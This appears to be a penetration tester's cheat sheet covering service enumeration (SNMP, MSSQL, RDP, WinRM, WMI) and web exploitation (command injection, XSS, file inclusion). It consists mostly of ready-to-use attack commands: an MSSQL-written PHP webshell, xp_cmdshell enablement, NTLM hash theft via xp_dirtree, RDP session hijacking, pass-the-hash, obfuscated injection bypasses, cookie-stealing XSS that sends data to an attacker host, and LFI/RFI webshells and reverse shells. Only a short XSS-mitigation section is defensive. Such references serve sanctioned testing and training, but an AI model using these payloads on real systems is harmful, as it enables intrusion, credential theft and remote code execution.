VRFY <USER>  # 250 success; 252 maybe/not; 550 failure
EXPN

SNMP

• UDP 161: normal
• UDP 162: “trap” or alert
• OIDs: https://www.alvestrand.no/objectid/top.html
• Versions:
  • v1/v2c: unencrypted
  • v3: encryption via PSK
• /etc/snmp/snmpd.conf
  • https://www.net-snmp.org/docs/man/snmpd.conf.html

Management Information Base (MIB) is a text file of Object Identifier (OID) s, which provide addresses to access device info, in the Abstract Syntax Notation One (ASN.1) based ASCII text format. Community Strings are sort of “passwords” to manage the access level.

# Enum via nmap
sudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan <TARGET>

### Brute-force names of Community Strings
# - Default Strings: "public" (Read-Only) and "private" (Read/Write) are common
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET>
// probably "public"

### Brute-force OIDs and info
# -v 1,2c,3
snmpwalk -v <VERSION> -c <COMMUNITY_STRING> <TARGET> .1

### Brute-force OIDs
# -2 : use v2
# braa usu. uses Version 1
braa <COMMUNITY_STRING>@<TARGET>:.1.*
braa <COMMUNITY_STRING>@<TARGET>:.1.3.6.*

Win: MSSQL

• TCP/UDP 1433: normal
• TCP 2433: hidden mode
• default system schemas/databases:
  • master - keeps the information for an instance of SQL Server.
  • msdb - used by SQL Server Agent.
  • model - a template database copied for each new database.
  • resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
  • tempdb - keeps temporary objects for SQL queries.
• xp_cmdshell:
  • xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure
  • The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account
  • xp_cmdshell operates synchronously. Control is not returned to the caller until the command-shell command is completed

Microsoft’s closed-source version of SQL.

• https://www.microsoft.com/en-us/sql-server/sql-server-2019
• https://learn.microsoft.com/en-us/ssms/install/install?view=sql-server-ver15
• https://learn.microsoft.com/en-us/sql/relational-databases/databases/system-databases?view=sql-server-ver15
• https://learn.microsoft.com/en-us/sql/tools/configuration-manager/named-pipes-properties?view=sql-server-ver15

# Enumerate via nmap
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=<USER>,mssql.password=<PASSWORD>,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>

# Enumerate via MSF
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run

### Login via Windows auth
impacket-mssqlclient -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>

# Survey
SELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin');  -- 1+ is admin
# Users
SELECT name FROM master..syslogins;
# Databases
SELECT name FROM master..sysdatabases;

# show tables ;
USE <DATABASE> ;
SELECT name FROM sys.tables;

Read Files

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Write Files (to achieve command execution)

sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE

Enable xp_cmdshell

• https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15

enable_xp_cmdshell
-- These are the same as the above single command
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE

xp_cmdshell <COMMAND>

-- or run linked server command
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>]

Impersonate User

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' ;
GO

-- Impersonating the SA User (admin)
USE master
EXECUTE AS LOGIN = 'sa'
-- Verify
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- 0 is NOT admin

Linked Servers

SELECT srvname, isremote FROM sysservers
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [<TARGET>\SQLEXPRESS]

-- Capture NTLM Hash
sudo responder -I <INTERFACE>

# XP_DIRTREE Hash Stealing
EXEC master..xp_dirtree '\\<ATTACKER>\share'
# XP_SUBDIRS Hash Stealing
EXEC master..xp_subdirs '\\<ATTACKER>\share'

Win: RDP

• TCP 3389: normal
• UDP 3389: automatic w/ RDP 8.0+ for performance (frames, audio, etc.)
• https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon

Also called “Terminal Services”.

#Enable Restricted Admin on Target (Requires Admin rights)
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# Now RDP with Hash
xfreerdp3 /v:<TARGET> /u:<USER> /pth:<PASS_HASH> /cert:ignore +clipboard /dynamic-resolution /drive:/usr/share/windows-resources/mimikatz/x64,share

# Enum via nmap
sudo nmap -sV -sC --script 'rdp*' -p3389 <TARGET>

# Enum RDP security posture
sudo cpan
sudo cpan Encoding::BER
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl <TARGET>

# Connects to RDP and mounts mimikatz share
mkdir loot; xfreerdp3 +multitransport /clipboard /dynamic-resolution /cert:ignore /v:<TARGET> /u:<USER> /p:'<PASSWORD>' /drive:'/usr/share/windows-resources/mimikatz/x64',share /drive:"$HOME/loot",loot

# Impersonate other logged-in user
# NOTE: needs SYSTEM
query.exe user
tscon.exe <SESSION_ID> /dest:<SESSION_NAME>

# Local Admin => SYSTEM
sc.exe create sessionhijack binpath= "cmd.exe /k tscon.exe <SESSION_ID> /dest:<SESSION_NAME>"
net.exe start sessionhijack

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Win: WinRM

• TCP 5985/5986: via HTTP/HTTPS respectively

# Enum via nmap
sudo nmap --disable-arp-ping -n -Pn -sV -sC -p5985,5986 <TARGET>

• https://github.com/Hackplayers/evil-winrm

evil-winrm -u <USER> -p <PASSWORD> -i <HOST>
evil-winrm -u <USER> -H <PASS_HASH> -i <HOST>

PowerShell Remoting

Requires valid Kerberos Ticket (PtT) or active NTLM Injection (PtH) in the current session.

Ports

• TCP/5985 (HTTP)
• TCP/5986 (HTTPS)

Requirements

• Administrative permissions OR
• Member of “Remote Management Users” OR
• Explicit PSSession configuration

# PowerShell
$password = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("<DOMAIN>\<USER>", $password)
Enter-PSSession -Credential $cred -ComputerName <TARGET_HOSTNAME>

Win: WMI

• TCP 135: first, initialization
• TCP <RHP>: afterwards, comms

# Run interactive shell
impacket-wmiexec <USER>:"<PASSWORD>"@<TARGET>
# Run remote command
impacket-wmiexec <USER>:"<PASSWORD>"@<TARGET> "<COMMAND>"

5 - Exploitation

• Exploit DBs
  • https://www.exploit-db.com/
  • https://www.rapid7.com/db/
  • https://www.vulnerability-lab.com/

cc+++ title = “Command Injection” +++

• https://swisskyrepo.github.io/PayloadsAllTheThings/Command%20Injection/
  • Without Space: https://swisskyrepo.github.io/PayloadsAllTheThings/Command%20Injection/#bypass-without-space
  • Brace Expansion: https://swisskyrepo.github.io/PayloadsAllTheThings/Command%20Injection/#bypass-with-brace-expansion
  • Bypass Variable Expression: https://swisskyrepo.github.io/PayloadsAllTheThings/Command%20Injection/#bypass-with-variable-expansion

Overview

User-controlled input that can lead to queries or code execution on the target server (OS, SQL, XSS, etc.). Front-end and back-end often use different validation, which can create vulnerabilities.

NOTE: Try URL encoding, newlines, tabs instead of spaces, and other encoding when characters are blocked.

Injection Types

Workarounds

When a crucial character is blocked, reference it from the environment (variable) or use alternate syntax. Use man ascii (Linux) or Get-ChildItem Env: (PowerShell) to find usable characters.

Linux

Curly-bracket expansion and character shifting: `\` is 92 (ASCII), `[` is 91.

• Commands: Mix quotes into the name: w"h"o"am"i, who$@ami, w\ho\am\i.
• Case: $(tr "[A-Z]" "[a-z]"<<<"WhOaMi") or $(a="WhOaMi";printf %s "${a,,}").
• Reversals: $(rev<<<'imaohw').
• Encoded: echo -n 'cat /etc/passwd | grep 33' | base64 → bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==).
• Use <<< instead of | when pipes are blocked.

Windows

• Commands: Insert ^: who^ami. Try case variants: WHOAMI, wHoaMi.
• Reversals: iex "$('imaohw'[-1..-20] -join '')".
• Encoded (Unicode Base64): [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) → iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))".

Tools

Useful against basic WAFs and static regex in web-based command injection. Modern EDRs often detect these via telemetry.

Linux: Bashfuscator

• https://github.com/Bashfuscator/Bashfuscator

Generates heavily obfuscated bash. Tune down for web use (small payloads). Evades WAFs by breaking strings into arrays and reconstructing at runtime.

# 1. Install (requires specific setuptools)
git clone https://github.com/Bashfuscator/Bashfuscator && cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user

# 2. Generate a short payload (-s 1 -t 1 --layers 1)
cd bashfuscator/bin/
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1

# 3. Test locally before sending
bash -c '<PASTE_OUTPUT>'

Windows: DOSfuscation

• https://github.com/danielbohannon/Invoke-DOSfuscation

Interactive PowerShell framework for obfuscating cmd.exe payloads. Uses env var substring extraction (e.g. %TEMP:~-3,-2%) so keywords don’t appear in the HTTP request.

# 1. Install & load
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation

# 2. Interactive: set command then encoding
SET COMMAND type C:\Users\Public\flag.txt
encoding
1

Cross-site scripting (XSS)

• https://owasp.org/www-community/attacks/xss/
• https://swisskyrepo.github.io/PayloadsAllTheThings/XSS%20Injection/#methodology
• https://github.com/payload-box/xss-payload-list/blob/main/Cheatsheet.md#xss-cheatsheet

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There are two sides: source (frontend) and sink (backend).

REMEMBER: Viewing the Page Source (CTRL+U) or Inspecting Element (F12) are two separates things: respectively, one is the HTTP response (static site, scripts pre-execution) and the other is the final website (dynamically loaded, scripts post-execution)

Breaking Context

Manual Payloads

Sometimes, certain payloads are not allowed

<script>alert(window.origin)</script>

<img src="" onerror=alert(window.origin)>

<svg/onload=alert(window.origin)>

// Polyglot Breaker
javascript:"/*\"/*`/*' /*</title></textarea>--></noscript></style></xmp>"></a><img src=x onerror=alert(window.origin)>//

---

# Setup listener on ATTACKER_IP
sudo python3 -m http.server 80

// Remote script
<script src="http://<ATTACKER_IP>/script.js"></script>

// Same idea but enumerate vuln fields
<script src="http://<ATTACKER_IP>/username"></script>

// Exfil cookies
document.location='http://<ATTACKER_IP>/index.php?c='+document.cookie;
new Image().src='http://<ATTACKER_IP>/index.php?c='+document.cookie;

Login Form Injection

<h3>Please login to continue</h3>
<form action=http://<ATTACKER_IP> >
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

Blind XSS

• https://swisskyrepo.github.io/PayloadsAllTheThings/XSS%20Injection/#blind-xss

Manual

Generally, to enumerate Blind XSS vulns, start by setting a server to receive a callback for a particular HTML field that is being tested.

mkdir /tmp/tmpserver && cd /tmp/tmpserver
cat << 'EOF' > script.js
new Image().src='http://10.10.14.175:8080/index.php?c=' + document.cookie;
EOF
php -S 0.0.0.0:8080

NOTE: usually, password fields are hashed and email fields are validated client/server side, so they are harder or impossible

# MODIFY PAYLOAD AS NEEDED
PAYLOAD='"><script src=http://<ATTACKER_IP>:8080/script.js></script>'
# Encode it
ENCODED=$(python3 -c "import urllib.parse; print(urllib.parse.quote('${PAYLOAD}'))")
# Hack it!
curl "http://<TARGET>/<PAGE>?\
Name=${ENCODED}\
&Email=${ENCODED}\
&Phone+Number=${ENCODED}\
&Product=${ENCODED}\
&os=${ENCODED}\
&browser=${ENCODED}\
&message=${ENCODED}\
&ttype=${ENCODED}" \
-H 'X-Requested-With: XMLHttpRequest'

Check the PHP server for the response with the cookie. Then add the cookie to the browser and visit the appropriate login page:

• Click Shift+F9 to show the Storage bar
• Click on the + button on the top right corner
• Add Name is the part before = and the Value is the part after = from the stolen cookie

Dalfox

• https://github.com/hahwul/dalfox

NOTE: this is very dangerous and can break servers easily

# this installs the program at `~/go/bin/dalfox`
go install github.com/hahwul/dalfox/v2@latest

# HTTP GET
dalfox url 'http://<TARGET>/?<PARAM>=<VALUE>'

# HTTP POST (can include multiple params for -d)
# COOKIES: -C 'PHPSESSID=<YOUR_COOKIE>'
dalfox url 'http://<TARGET>/' -X POST -d '<PARAM>=<VALUE>'

Blind

# Fuzz web page fields
dalfox url "http://<TARGET_IP>/<PAGE>" \
  --skip-mining-dom \
  --blind "http://<ATTACKER_IP>:8080" \
  -X POST \
  -d "<PARAM>=<VALUE>"
  --header "X-Requested-With: XMLHttpRequest" \
  --blind "http://10.10.14.175:8080" \
  --delay 500

XSS Prevention & Mitigation

XSS defense requires a Defense in Depth approach. Never rely solely on Frontend validation (it is easily bypassed).

Frontend

• Input Validation: Use Regex to enforce strict formats (e.g., Email, Date).
• Sanitization: Strip dangerous tags before processing.
  • Library: DOMPurify (Standard). DOMPurify.sanitize(dirtyInput).
• Safe Sinks: Avoid writing raw HTML.
  • UNSAFE: innerHTML, outerHTML, document.write(), jQuery append(), html().
  • SAFE: innerText, textContent.

Backend

• Input Validation: Reject input that doesn’t match expected types (e.g., PHP filter_var).
• Input Sanitization: Escape special characters before storage (e.g., PHP addslashes, Node DOMPurify).
• Output Encoding (CRITICAL): Convert special characters into HTML Entities (e.g., < → <) before rendering.
  • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
  • NodeJS: html-entities library.

Server Configuration

• Content Security Policy (CSP): The most powerful header against XSS.
  • Content-Security-Policy: script-src 'self' (Only allow scripts from the same origin, blocks inline JS).
• Cookie Flags:
  • HttpOnly: Prevents JavaScript from reading document.cookie.
  • Secure: Ensures cookies are only sent over HTTPS.
• Headers:
  • X-Content-Type-Options: nosniff (Prevents MIME sniffing).
• WAF: Web Application Firewall (ModSecurity, AWS WAF) to block common payloads.

File Inclusion

• https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
• Web Root Dirs:
  • Linux: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt
  • Windows: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt

File Inclusion (FI) allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

There are 2 types, which depend on the underlying vulnerable function:

• local: for local files
• remote: remote URLs

Code Examples of FI

These examples use the idea of a webpage in multiple languages that allows the user to dynamically load webpage in the selected language.

PHP

// Selector
if (isset($_GET['language'])) {
    include($_GET['language']);
}

NodeJS

// Selector
if(req.query.language) {
    fs.readFile(path.join(__dirname, req.query.language), function (err, data) {
        res.write(data);
    });
}

// about.html
app.get("/about/:language", function(req, res) {
    res.render(`/${req.params.language}/about.html`);
});

Java

// Selector
<c:if test="${not empty param.language}">
    <jsp:include file="<%= request.getParameter('language') %>" />
</c:if>

// about.html
<c:import url= "<%= request.getParameter('language') %>"/>

.NET

// Selector
@if (!string.IsNullOrEmpty(HttpContext.Request.Query['language'])) {
    <% Response.WriteFile("<% HttpContext.Request.Query['language'] %>"); %> 
}

// about.html
@Html.Partial(HttpContext.Request.Query['language'])

Can Function X Read/Execute?

Checking Vulnerability

Due to file permissions, these files should almost always exist and be accessible if a target is vulnerable to LFI:

• Linux: /etc/passwd
• Windows: C:\Windows\boot.ini

Generally, they will be 3-5 folder depths down from the root filesystem:

# without '/'
../../../../etc/passwd
# with '/'
/../../../../etc/passwd

# basic filter '../' bypass
....//....//....//etc/passwd
..././
....\/

# URL encoding: must encode entire string
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

# regex might require a specific string or extension for a folder or extension
# the extension part can limit the files accessible
languages/.*php

# overflow character limit to evade extension filter
# ONLY: PHP <5.3 versions
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done

# null byte
# ONLY: PHP <5.5 versions
../../../../etc/passwd%00.php

URL Encoding

# Total URL Encoding via Python
echo -n '<LFI_STRING>' | python3 -c "import sys; print(''.join('%{0:02x}'.format(ord(c)) for c in sys.stdin.read()))"

Finding Files

Typically, the backend server will not have debug messages enabled. In order to enumerate files (such as other *.php or config files in the same directory), fuzzing the web server and keeping all HTTP responses (e.g. codes 301, 302, 403, etc.) can show that those files or locations exist AND could be accessible via LFI (but not normal HTTP requests)

# Find *.php files that DO EXIST on the server
ffuf -ic -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<TARGET>/FUZZ.php

If the found files can be accessed via LFI, but get executed instead of merely read, use a PHP filter like base64 to encode the file to read and prevent it from being executed:

# NOTE: .php get appended to `resource` so "<FILE>" is really "<FILE>.php"
http://<TARGET>/<PAGE>?<PARAMETER>=php://filter/read=convert.base64-encode/resource=<FILE>

# View Page Source > Decode base64
echo '<BASE64> | base64 -d'

Local File Inclusion

• Wrappers:
  • Requires allow_url_include = On:
    • Data: https://www.php.net/manual/en/wrappers.data.php
    • Input: https://www.php.net/manual/en/wrappers.php.php
  • Requires extension=expect:
    • https://www.php.net/manual/en/wrappers.expect.php

Check Config

• Linux: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
• Windows: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

# If the LFI is already know (e.g. via LFImap) this
# can browse for all accessible config files
ffuf -w <LFI_LIST>:FUZZ -u 'http://<TARGET>/<PAGE>?<PARAMETER>=<LFI>FUZZ' -fs 0 -v

Execute Commands

If able, check that appropriate settings are enabled and the underlying function supports the command.

via data

# Base64'd PHP Webshell: <?php system($_GET["cmd"]); ?>
curl -sko- 'http://<TARGET>/<PAGE>?<PARAMETER>=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=;<COMMAND>;'

via input

# POST PHP Webshell
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' 'http://<TARGET>/<PAGE>?<PARAMETER>=php://input&cmd=<COMMAND>'

via expect

curl -sko- 'http://<TARGET>/<PAGE>?<PARAMETER>=expect://<COMMAND>'

Remote File Inclusion

If able, check that appropriate settings are enabled and the underlying function supports the command. Sometimes, though not always, command execution is allowed.

# URL is the remote resource
http://<TARGET>/<PAGE>?<PARAMETER>=<URL>

# Create remote PHP web shell
# NOTE: this only works for get and execute style functions
echo '<?php system($_GET["cmd"]); ?>' > shell.php
sudo python3 -m http.server 8080

# Execute commands by calling back to ATTACK_IP and executing that file
curl -sko- 'http://<TARGET>/<PAGE>?<PARAMETER>=<ATTACKER_IP>:<PORT>/shell.php?cmd=<COMMAND>'

Log Poisoning

Poisoning a file to gain execution can be done by PHPSESSION, which is the settings a user has selected for a webpage.

# Get PHPSESSION from F12 > Storage
# NOTE: that file is stored on disk as:
# /var/lib/php/sessions/sess_<PHPSESSION>

# Read the settings for the PHPSESSION
http://<TARGET>/<PAGE>?language=/var/lib/php/sessions/sess_<SESSION>

# Let's see if we control the OPTION
http://<TARGET>/<PAGE>?<PARAMETER>=CONTROL
# Now read the value
http://<TARGET>/<PAGE>?language=/var/lib/php/sessions/sess_<SESSION>

# Set OPTION to a PHP webshell
curl -sc cookies.txt 'http://<TARGET>/<PAGE>?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E'

# Now execute commands
curl -sko- -b cookies.txt 'http://<TARGET>/<PAGE>?language=/var/lib/php/sessions/sess_<SESSION>&cmd=<COMMAND>'

Scanning

• Top LFI Parameters: https://book.hacktricks.wiki/en/pentesting-web/file-inclusion/index.html#top-25-parameters
• LFI Paylods: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
• Default Web Roots:
  • Linux: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt
  • Windows: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
• Server configs + more:
  • Linux: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
  • Windows: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

To find parameters that could be vulnerable to LFI, first search for the GET/POST parameter, then try out LFI payloads as a value.

NOTE: these payloads are easily defeated by file extension filtering, so that needs to be mitigated as needed. Often times:

1. Check server configs
2. Attempt to read and see the filtering from the pages
3. Incorporate the filtering into the ffuf URL portion

# FIND: params
ffuf -ic -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://<TARGET>/<PAGE>?FUZZ=value -fs <SIZE>

# FIND: LFI payloads
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<TARGET>/<PAGE>?<PARAM>=FUZZ' -fs <SIZE>

LFI Filter Evasion

When the default Jhaddix wordlist fails (returns 200s but no content, or 500 errors), the application is filtering your input.

Mechanics & Logic

1. The “Forced Extension” Problem (.php)

If the code is include($_GET['page'] . ".php");, requesting /etc/passwd makes the server look for /etc/passwd.php, which doesn’t exist.

Solution: Pivot to reading the application’s source code using PHP wrappers. If you request php://filter/convert.base64-encode/resource=config, the server appends .php making it config.php. The wrapper Base64-encodes the PHP code instead of executing it, bypassing the extension filter entirely.

2. The str_replace Trap

Many developers try to fix LFI with str_replace("../", "", $input).

The bypass: If you send ....//, the filter finds the ../ in the middle and deletes it. What remains is the outer ../, which pieces itself back together after the filter runs.

Advanced Scanning

The LFI-Jhaddix list is a great scattergun; to explicitly test bypasses, use targeted SecLists:

# FIND: Advanced bypasses (nested, encoded, null bytes)
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<TARGET>/<PAGE>?<PARAM>=FUZZ' -fs <SIZE>

# FIND: PHP wrapper source code extraction (targets common files like index, config, db)
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<TARGET>/<PAGE>?<PARAM>=php://filter/read=convert.base64-encode/resource=FUZZ' -fs <SIZE>

# NOTE: filter out by response size since an HTTP response of 200 OK will always be received
ffuf -ic -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://<TARGET>/<PAGE>?FUZZ=value -fs <SIZE>

# NOTE: filter out by response size since an HTTP response of 200 OK will always be received
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://<TARGET>/<PAGE> -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d 'FUZZ=value' -fs <SIZE>

LFImap

Automates exploitation of discovery, filter evasion, and RCE escalation (wrappers, log poisoning, etc.).

# Install
git clone https://github.com/hansmach1ne/LFImap.git && cd LFImap
python3 -m pip install -r requirements.txt

# Base Scan (Use '*' to mark the injection point)
python3 lfimap.py -U 'http://<TARGET>/index.php?page=*'

# Full Auto-Exploit (Tests all bypasses & attempts RCE)
python3 lfimap.py -U 'http://<TARGET>/index.php?page=*' -a

# Pop a Reverse Shell directly (if vulnerable)
python3 lfimap.py -U 'http://<TARGET>/index.php?page=*' --exploit --lhost <ATTACKER_IP> --lport <LPORT>

Nuclei

Best for discovering zero-days, CVEs, and blind out-of-band (OOB) inclusions across massive attack surfaces.

go: github.com/hahwul/dalfox/v2@latest (in github.com/hahwul/dalfox/v2@v2.12.0): go.mod:3: invalid go version '1.23.0': must match format 1.23

wget https://go.dev/dl/go1.23.6.linux-amd64.tar.gz
mkdir -p ~/go_bin
tar -C ~/go_bin -xzf go1.23.6.linux-amd64.tar.gz
export PATH=$HOME/go_bin/go/bin:$HOME/go/bin/:$PATH
echo -e '\nexport PATH=$HOME/go_bin/go/bin:$HOME/go/bin/:$PATH' | tee -a ~/.bashrc ~/.zshrc
go version

go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Update templates first
nuclei -ut

# Target a specific URL for all known LFI vectors
echo 'http://<TARGET>/index.php?page=test' | nuclei -tags lfi

# Fuzzing Mode (Uses Nuclei's DAST engine to mutate parameters)
nuclei -u 'http://<TARGET>/' -dast -tags lfi

# Blind OOB LFI (Catch callbacks with interactsh automatically)
nuclei -u 'http://<TARGET>/' -tags oast,lfi